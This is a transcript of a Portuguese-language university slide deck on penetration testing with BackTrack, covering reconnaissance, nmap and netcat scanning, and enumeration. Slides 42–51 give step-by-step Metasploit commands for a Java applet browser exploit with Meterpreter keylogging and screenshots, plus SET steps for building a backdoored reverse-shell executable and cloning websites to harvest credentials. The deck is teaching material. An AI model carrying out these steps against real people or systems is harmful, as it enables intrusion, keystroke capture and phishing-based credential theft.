Back track apresentação

58
Kleber Santos

description

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.

Transcript of Back track apresentação

Page 1: Back track   apresentação

Kleber Santos

Page 2: Back track   apresentação
Page 3: Back track   apresentação
Page 4: Back track   apresentação

Introdução

Page 5: Back track   apresentação

IntroduçãoO que é?

• Ferramenta voltada para testes de penetração;

• Primeira versão lançada em 2006;• Possui mais de 300 ferramentas para

tais testes;

Page 6: Back track   apresentação

Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:

http://www.backtrack-linux.org/

Page 7: Back track   apresentação

IntroduçãoUso em Certificações

• Todas oferecidas pela Offensive Security que mantém o BackTrack.

Page 8: Back track   apresentação

Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:

http://www.backtrackbrasil.com.br/site/vd/

Page 9: Back track   apresentação

Pentest

• Metodologia para testes de penetração;• Simula ataques;• Verifica a segurança de um sistema;• Possibilita criação de mecanismos de

defesa;

Page 10: Back track   apresentação

Pentest

• Procedimentos divididos em cinco etapas:

1. Obtenção de informações do alvo;

2. Varreduras de sistema;

3. Ganho de acesso ao sistema;

4. Mantendo o acesso ao sistema;

5. Retirada de evidencias;

• Abordaremos as três primeiras etapas divididas em quatro partes;

Page 11: Back track   apresentação

Pentest

• Procedimentos divididos em cinco etapas:

1. Obtenção de informações do alvo;

2. Varreduras de sistema;

3. Ganho de acesso ao sistema;

4. Mantendo o acesso ao sistema;

5. Retirada de evidencias;

• Abordaremos as três primeiras etapas divididas em quatro partes;

Page 12: Back track   apresentação

Primeira Parte

• Obtenção de Informação;• Detecção de Sistemas Ativos;• Técnica Para Obter Informações DNS;• FINGERPRINT;

Page 13: Back track   apresentação

Obtenção de Informação

• Metodologia usada para "reconhecimento do terreno";

• Pode ser de forma: passiva (recursos na internet); ativa (engenharia social);

Page 14: Back track   apresentação

• Princípios básicos na obtenção de informações;

• PING detecta hosts ativos;

Detecção de Sistemas Ativos

Page 15: Back track   apresentação
Page 16: Back track   apresentação

FPING: Executa ping para diferentes hosts ao mesmo

tempo através de um *.txt;

HPING3: Detecta hosts, regras de firewall e realiza

varreduras de portas;

Genlist: Verifica uma lista de hosts ativos;

Detecção de Sistemas Ativos

Page 17: Back track   apresentação

• DNS traduz endereços de IP em nomes de domínio;

• A ferramenta nslookup permite obter informações sobre DNS;

Informações DNS

Page 18: Back track   apresentação
Page 19: Back track   apresentação

DNSENUM: Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc.

DNSMAP: Descobre subdomínios relacionados ao domínio-alvo. Acompanha

wordlist;

DNSRECON: Permite consultas reversas por faixas de IP, NS, SOA, registros MX,

transferências de zonas e enumeração de serviços;

FIERCE: Retorna informações adicionais como HINFO, especificando o

processador da máquina e o servidor;

Informações DNS

Page 20: Back track   apresentação

• Técnica na qual se obtém informações sobre sistema operacional;

• O NMAP é utilizado para tal checagem de versões;

root@bt~# nmap –O <ip_do_alvo>

FINGERPRINT

Page 21: Back track   apresentação

TCP SYN (-sS) examina portas de maneira rápida e difícil

de ser detectado por firewalls ou IDS;

TCP Connect (-sT) executa varredura utilizando o Three-Way

Handshake;

UDP (-sU) possibilita varredura do protocolo UDP;

FINGERPRINT

Page 22: Back track   apresentação

TCP FIN (-sF, -sX, -sN) utilizados na tentativa de travessia de

firewalls;

TCP ACK (-sA) tática utilizada para detecção de regras de

firewall;

TCP Windows (-sW) varreduras por janelas, parecido com o método

ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;

FINGERPRINT

Page 23: Back track   apresentação

Segunda Parte

• SCANNING de portas• Detecção de Sistemas Ativos;• NETCAT – Canivete Suíço;

Page 24: Back track   apresentação

SCANNING de portas

• Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema;

Scanning de portas: identifica portas ativas;

De vulnerabilidades: identifica fraquezas no sistema;

De redes: identifica os hosts ativos;

Page 25: Back track   apresentação

Detecção de Sistemas Ativos

Page 26: Back track   apresentação

NETCAT – Canivete Suíço

• Outra ferramenta possível para varreduras num host;

root@root:~# nc -v -z 192.168.32.128 1-4000

Page 27: Back track   apresentação

• Fase de Enumeração;• HTTPRINT;• AMAP, SMTP e SMTPSCAN;

Terceira Parte

Page 28: Back track   apresentação

Fase de Enumeração

• Nesta fase o invasor tenta obter: nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc;

• A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;

Page 29: Back track   apresentação

Fase de Enumeração

• Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP:

root@root~# nmap –T4 –sU –sV <ip_host_alvo>

Page 30: Back track   apresentação

Fase de Enumeração

• Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck:

root@root:/pentest/enumeration/snmp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>

Page 31: Back track   apresentação

HTTPRINT

• Possibilita detectar versões de servidores;

• Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml

Page 32: Back track   apresentação
Page 33: Back track   apresentação
Page 34: Back track   apresentação

AMAP, SMTP e SMTPSCAN

AMAP tenta identificar aplicações rodando em

portas diferentes da usual.

SMTP e SMTPScan busca usuários válidos do nosso host,

destinando um IP alvo;

Page 35: Back track   apresentação

• Ganho de Acesso;• Abordagem à Força Bruta;• SET e Metasploit;

Quarta Parte

Page 36: Back track   apresentação

Ganho de Acesso

• Utiliza de ferramentas que explorem serviços como FTP e SSH;

• Explora vulnerabilidades e senhas;• A técnica de engenharia social é

extremamente importante em tal etapa;

Page 37: Back track   apresentação

Força Bruta

xHydra ou Hidra-GTK

Ferramenta utilizada para quebra de senhas ONLINE;

Suporta diversos protocolos; Permite utilização de arquivos auxiliares

para listas de usuários e senhas (wordlists);

Page 38: Back track   apresentação

Força Bruta

• Dicionários e força bruta são técnicas utilizadas para o password cracking;

• Outras ferramentas para o mesmo intuito são:

Medusa; John The Ripper;

Todas elas inclusas no BackTrack 5 R3;

Page 39: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

Metasploit Conta com uma interface gráfica

ARMITAGE e também a linha de comando, MSFCONSOLE;

SET Tem como alvo fraquezas e estupidez

humanas;

Page 40: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Através do comando msfconsole acessamos o Metasploit via linha de comando;

• Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;

Page 41: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

Page 42: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• root@bt:~# msfconsole

• root@bt:~# search java

• root@bt:~# use exploit/multi/browser/java_signed_applet

• root@bt:~# show options

Page 43: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

set srvhost <ip_local_host_backTrack>

set srvport 80 #seta a porta 80 como acesso

set uripath <caminho_para_link_url>

set appletname <nome_para_o_arquivo_jar>

exploit

Page 44: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Após acessar a URL gerada o alvo permitirá acesso ao invasor;

sessions –i 1 # dá acesso à máquina alvo

sysinfo# obtém informações da máquina alvo

Page 45: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

help# lista comandos do METERPRETER

screenshot# obtém um print da tela da máquina invadida

Page 46: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

keyscan_start# starta um sniffer para captura de navegação

keyscan_dump# exibe informações capturadas

Page 47: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload;

• Ao acessar a ferramenta, navega-se em:

1 – Social Engineering Attacks;4 – Create a Payload na Listener;

Page 48: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack);

• Feito isso, navega-se em:

2 – Windows Reverse TCP Meterpreter;16 – Backdoored Executable (BEST);

Page 49: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Após informar a porta solicitada, ele gerará o arquivo executável:

/pentest/exploits/set msf.exe

• Confirma-se com yes o start do listener;• O acesso à máquina alvo se dará após a

execução do arquivo pela mesma e executando:

sessions –i 1.

Page 50: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções:

1 – Social Engineering Attacks;2 – Website Attack Vectors;3 – Credential Harvester Attack Vectors;2 – Site Cloner;

Page 51: Back track   apresentação

Invadindo Sistemas com SET e Metasploit

• Informa-se a URL do site a ser clonado;

• Acessa-se através do IP da máquina do atacante;

Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;

Page 52: Back track   apresentação

Conclusão

• Técnicas de invasão estão

diretamente atreladas às

vulnerabilidades dos sistemas e das pessoas

Page 53: Back track   apresentação

Conclusão

• Configurar devidamente servidores;• Atualizar devidamente SOs e SWs;• Utilização de senhas fortes;• Desconfiar de coisas óbvias;• Usufruir de uma política de segurança;

Page 54: Back track   apresentação

Conclusão

• Atentar à boas práticas voltadas

à segurança nos dá uma garantia quanto

ao CID;

Page 55: Back track   apresentação
Page 56: Back track   apresentação

klebernox.wordpress.com/backtrack-abordagem-a-seguranca-em-redes/

Page 57: Back track   apresentação

Obrigado !

Page 58: Back track   apresentação